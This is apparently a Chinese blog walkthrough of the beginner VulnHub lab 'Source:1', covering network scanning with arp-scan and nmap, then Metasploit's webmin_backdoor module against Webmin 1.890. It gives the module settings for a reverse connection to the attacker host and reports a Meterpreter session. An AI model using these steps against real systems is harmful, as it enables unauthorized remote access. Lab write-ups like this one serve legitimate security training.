适合新手练习简单web漏洞利用的靶机vulnhub——Source:1

目录

主机发现

信息收集

漏洞利用

flag


主机发现

靶机窗口

确认靶机和攻击机在一个网段

信息收集

攻击机扫描当前网段的主机

sudo arp-scan -l

mac地址后两位4e8e靶机的ip地址就是10.4.7.135了

看下都开放了那些端口

sudo nmap -sS -sV -A -n 10.4.7.135

端口信息:

22:端口:ssh服务,OpenSSH的版本是7.6pl,其中的"pl"表示它是一个修订版本。是Ubuntu Linux发行的第四个修订版本。

1000端口:http服务,Miniserv 1.890,它是Webmin的一个组件,用于管理Webmin的网络服务。

去访问下它的网页

看到了webmin 直接使用msf 搜索一下webmin都有那些漏洞然后进行配置利用。

漏洞利用

msfconsole

查看漏洞信息

search webmin

这是一个19年8月10号发现的安全漏洞

webmin_backdoor:这个特定的后门漏洞可能允许攻击者在未经授权的情况下访问Webmin管理界面或执行其他恶意操作

password_change.cgi:这是指Webmin管理工具中的一个特定的CGI脚本,用于更改用户密码。该漏洞可能使攻击者能够利用漏洞修改用户密码或执行其他未经授权的操作。

选中这个漏洞

use 7 或 use exploit/linux/http/webmin_backdoor

配置利用(这边的srvhost和lhost是kali的ip,打错了QAQ)

set rhosts 10.4.7.135
set srvhost 10.4.7.130
set lhost 10.4.7.130
show targets

set rhosts 10.4.7.135:这将目标主机的IP地址设置为10.4.7.135。这是指定你要攻击的目标主机。

set srvhost 10.4.7.130: 这将监听地址设置为10.4.7.130。在这里,你正在告诉Metasploit要在哪个IP地址上监听来自受害者主机的连接。

set lhost 10.4.7.130: 这将回连地址设置为10.4.7.130。这是告诉Metasploit在成功利用漏洞后与你的主机建立反向连接的地址。

show targets 这是用来显示该漏洞的可利用目标。在这种情况下,显示了两个可利用标:Automatic(unix In-Memorv)和Automatic(Linux Dropper)。

通过这些设置,已经准备好利用Webmin后门漏洞,并且在成功利用后与目标主机建立反向连接。

set ssl true: 这个命令将SSL选项设置为true,这意味着Metasploit将使用SSL

set forceexploit true: 这个命令将强制利用(exploit)设置为true

exploit: 这个命令实际执行了渗透测试的攻击步骤

set target 1: 用于设置攻击目标

exploit:攻击

成功进入Meterpreter是Metasploit框架中的一种强大的后门载荷(payload),用于在受害主机上建立持久性访问、执行远程命令和操纵受感染系统的功能。

flag

  • 8
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值